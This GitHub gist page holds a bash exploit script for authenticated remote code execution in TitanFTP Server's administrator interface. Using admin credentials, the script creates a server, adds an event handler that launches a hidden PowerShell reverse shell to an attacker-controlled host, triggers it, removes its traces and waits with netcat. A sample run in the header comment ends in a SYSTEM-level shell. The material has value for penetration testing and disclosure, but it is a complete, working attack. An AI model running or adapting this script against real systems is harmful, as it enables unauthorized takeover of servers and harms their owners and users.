Skip to content

Instantly share code, notes, and snippets.

@bcoles

bcoles/titanftp-server-admin-event-handler-rce

Last active March 22, 2020 04:19
Show Gist options
  • Save bcoles/3c109e8ce380b73cf88abd12033dd1a6 to your computer and use it in GitHub Desktop.
Save bcoles/3c109e8ce380b73cf88abd12033dd1a6 to your computer and use it in GitHub Desktop.
Download ZIP
titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
Raw
titanftp-server-admin-event-handler-rce
#!/bin/bash
# titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Requires remote administration interface to be enabled. (Default port 31001/tcp).
# Creates a new server and adds an event handler to execute a PowerShell reverse shell.
# ---
# $ ./titanftp-server-admin-event-handler-rce
# TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Generating PowerShell reverse shell to 172.16.191.165:1337 ...
# No encoder or badchars specified, outputting raw payload
# Payload size: 1587 bytes
# Creating server (newtitanserver) ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Adding event (11021) ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse>testevent%7Ctestevent%7C1%7C1%7C1%7C0%7C0%7C3%7C1%7C11021%7C0%7C3006%7CC%3A%5Cwindows%5Csystem32%5Ccmd.exe%7C/c%20powershell.exe%20%2Dw%20hidden%20%2Dnop%20%2Dc%20%24a%3D%27172.16.191.165%27%3B%24b%3D1337%3B%24c%3DNew%2DObject%20system.net.sockets.tcpclient%3B%24nb%3DNew%2DObject%20System.Byte%5B%5D%20%24c.ReceiveBufferSize%3B%24ob%3DNew%2DObject%20System.Byte%5B%5D%2065536%3B%24eb%3DNew%2DObject%20System.Byte%5B%5D%2065536%3B%24e%3Dnew%2Dobject%20System.Text.UTF8Encoding%3B%24p%3DNew%2DObject%20System.Diagnostics.Process%3B%24p.StartInfo.FileName%3D%27cmd.exe%27%3B%24p.StartInfo.RedirectStandardInput%3D1%3B%24p.StartInfo.RedirectStandardOutput%3D1%3B%24p.StartInfo.RedirectStandardError%3D1%3B%24p.StartInfo.UseShellExecute%3D0%3B%24q%3D%24p.Start%28%29%3B%24is%3D%24p.StandardInput%3B%24os%3D%24p.StandardOutput%3B%24es%3D%24p.StandardError%3B%24osread%3D%24os.BaseStream.BeginRead%28%24ob%2C%200%2C%20%24ob.Length%2C%20%24null%2C%20%24null%29%3B%24esread%3D%24es.BaseStream.BeginRead%28%24eb%2C%200%2C%20%24eb.Length%2C%20%24null%2C%20%24null%29%3B%24c.connect%28%24a%2C%24b%29%3B%24s%3D%24c.GetStream%28%29%3Bwhile%20%28%24true%29%20%7B%20%20%20%20start%2Dsleep%20%2Dm%20100%3B%20%20%20%20if%20%28%24osread.IsCompleted%20%2Dand%20%24osread.Result%20%2Dne%200%29%20%7B%20%20%20%20%20%20%24r%3D%24os.BaseStream.EndRead%28%24osread%29%3B%20%20%20%20%20%20%24s.Write%28%24ob%2C0%2C%24r%29%3B%20%20%20%20%20%20%24s.Flush%28%29%3B%20%20%20%20%20%20%24osread%3D%24os.BaseStream.BeginRead%28%24ob%2C%200%2C%20%24ob.Length%2C%20%24null%2C%20%24null%29%3B%20%20%20%20%7D%20%20%20%20if%20%28%24esread.IsCompleted%20%2Dand%20%24esread.Result%20%2Dne%200%29%20%7B%20%20%20%20%20%20%24r%3D%24es.BaseStream.EndRead%28%24esread%29%3B%20%20%20%20%20%20%24s.Write%28%24eb%2C0%2C%24r%29%3B%20%20%20%20%20%20%24s.Flush%28%29%3B%20%20%20%20%20%20%24esread%3D%24es.BaseStream.BeginRead%28%24eb%2C%200%2C%20%24eb.Length%2C%20%24null%2C%20%24null%29%3B%20%20%20%20%7D%20%20%20%20if%20%28%24s.DataAvailable%29%20%7B%20%20%20%20%20%20%24r%3D%24s.Read%28%24nb%2C0%2C%24nb.Length%29%3B%20%20%20%20%20%20if%20%28%24r%20%2Dlt%201%29%20%7B%20%20%20%20%20%20%20%20%20%20break%3B%20%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%20%24str%3D%24e.GetString%28%24nb%2C0%2C%24r%29%3B%20%20%20%20%20%20%20%20%20%20%24is.write%28%24str%29%3B%20%20%20%20%20%20%7D%20%20%20%20%7D%20%20%20%20if%20%28%24c.Connected%20%2Dne%20%24true%20%2Dor%20%28%24c.Client.Poll%281%2C%5BSystem.Net.Sockets.SelectMode%5D%3A%3ASelectRead%29%20%2Dand%20%24c.Client.Available%20%2Deq%200%29%29%20%7B%20%20%20%20%20%20%20%20break%3B%20%20%20%20%7D%20%20%20%20if%20%28%24p.ExitCode%20%2Dne%20%24null%29%20%7B%20%20%20%20%20%20%20%20break%3B%20%20%20%20%7D%7D%7C0%7C0%7C60%7C0%7C0%7C</SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Executing event ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Removing event ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Removing server ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Listening on port 1337 ...
# Ncat: Version 7.80 ( https://nmap.org/ncat )
# Ncat: Listening on :::1337
# Ncat: Listening on 0.0.0.0:1337
# Ncat: Connection from 172.16.191.242.
# Ncat: Connection from 172.16.191.242:55477.
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.
#
# C:\Windows\system32>whoami
# whoami
# nt authority\system
# ---
# ~ bcoles
# target
RHOST="http://172.16.191.242:31001/admin.dll"
CREDS="Administrator:123"
# connect back
LHOST="172.16.191.165"
LPORT=1337
echo "TitanFTP Server Administrator Event Handler Authenticated RCE"
echo
echo "Generating PowerShell reverse shell to ${LHOST}:${LPORT} ..."
if command -v msfvenom; then
PAYLOAD=$(msfvenom --arch cmd --platform windows -p cmd/windows/reverse_powershell LHOST="${LHOST}" LPORT="${LPORT}")
else
# ./msfvenom -p cmd/windows/reverse_powershell LHOST=172.16.191.165 LPORT=1337 | sed 's/\$/\\\$/g'
PAYLOAD="powershell.exe -w hidden -nop -c \$a='${LHOST}';\$b=${LPORT};\$c=New-Object system.net.sockets.tcpclient;\$nb=New-Object System.Byte[] \$c.ReceiveBufferSize;\$ob=New-Object System.Byte[] 65536;\$eb=New-Object System.Byte[] 65536;\$e=new-object System.Text.UTF8Encoding;\$p=New-Object System.Diagnostics.Process;\$p.StartInfo.FileName='cmd.exe';\$p.StartInfo.RedirectStandardInput=1;\$p.StartInfo.RedirectStandardOutput=1;\$p.StartInfo.RedirectStandardError=1;\$p.StartInfo.UseShellExecute=0;\$q=\$p.Start();\$is=\$p.StandardInput;\$os=\$p.StandardOutput;\$es=\$p.StandardError;\$osread=\$os.BaseStream.BeginRead(\$ob, 0, \$ob.Length, \$null, \$null);\$esread=\$es.BaseStream.BeginRead(\$eb, 0, \$eb.Length, \$null, \$null);\$c.connect(\$a,\$b);\$s=\$c.GetStream();while (\$true) { start-sleep -m 100; if (\$osread.IsCompleted -and \$osread.Result -ne 0) { \$r=\$os.BaseStream.EndRead(\$osread); \$s.Write(\$ob,0,\$r); \$s.Flush(); \$osread=\$os.BaseStream.BeginRead(\$ob, 0, \$ob.Length, \$null, \$null); } if (\$esread.IsCompleted -and \$esread.Result -ne 0) { \$r=\$es.BaseStream.EndRead(\$esread); \$s.Write(\$eb,0,\$r); \$s.Flush(); \$esread=\$es.BaseStream.BeginRead(\$eb, 0, \$eb.Length, \$null, \$null); } if (\$s.DataAvailable) { \$r=\$s.Read(\$nb,0,\$nb.Length); if (\$r -lt 1) { break; } else { \$str=\$e.GetString(\$nb,0,\$r); \$is.write(\$str); } } if (\$c.Connected -ne \$true -or (\$c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and \$c.Client.Available -eq 0)) { break; } if (\$p.ExitCode -ne \$null) { break; }}"
fi
#echo "Retrieving servers ..."
#curl -is --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
# --data "<SRRequest><Target>DOM</Target><Action>ENUM</Action><ServerName/><Payload></Payload></SRRequest>"
SERVER_NAME="newtitanserver"
echo "Creating server (${SERVER_NAME}) ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
--data "<SRRequest><Target>SVR</Target><Action>CREATE</Action><ServerName>${SERVER_NAME}</ServerName><Payload><fxServerParams><RunAtStartup>1</RunAtStartup><ServerName>${SERVER_NAME}</ServerName><ServerDesc>${SERVER_NAME}</ServerDesc><Host>0.0.0.0</Host></fxServerParams></Payload></SRRequest>"
#EVENT_TYPE="11070" # "Connection attempt succeeded"
#EVENT_TYPE="11071" # "Connection attempt failed"
EVENT_TYPE="11021" # "Server start failed"
echo "Adding event (${EVENT_TYPE}) ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
--data "<SRRequest><Target>SVR</Target><Action>MODEVENT</Action><ServerName>${SERVER_NAME}</ServerName><Payload>A|testevent|testevent|1|1|1|0|0|3|0|${EVENT_TYPE}|0|3006|C:\\windows\\system32\\cmd.exe|/c ${PAYLOAD}|0|0|60|0|0|</Payload></SRRequest>"
EVENT_ID="1"
echo "Executing event ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
--data "<SRRequest><Target>SVR</Target><Action>MODEVENT</Action><ServerName>${SERVER_NAME}</ServerName><Payload>F|${EVENT_ID}|</Payload></SRRequest>"
echo "Removing event ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
--data "<SRRequest><Target>SVR</Target><Action>MODEVENT</Action><ServerName>${SERVER_NAME}</ServerName><Payload>D|${EVENT_ID}|</Payload></SRRequest>"
echo "Removing server ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
--data "<SRRequest><Target>SVR</Target><Action>DELETE</Action><ServerName>${SERVER_NAME}</ServerName><Payload></Payload></SRRequest>"
echo "Listening on port ${LPORT} ..."
nc -lvp "${LPORT}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment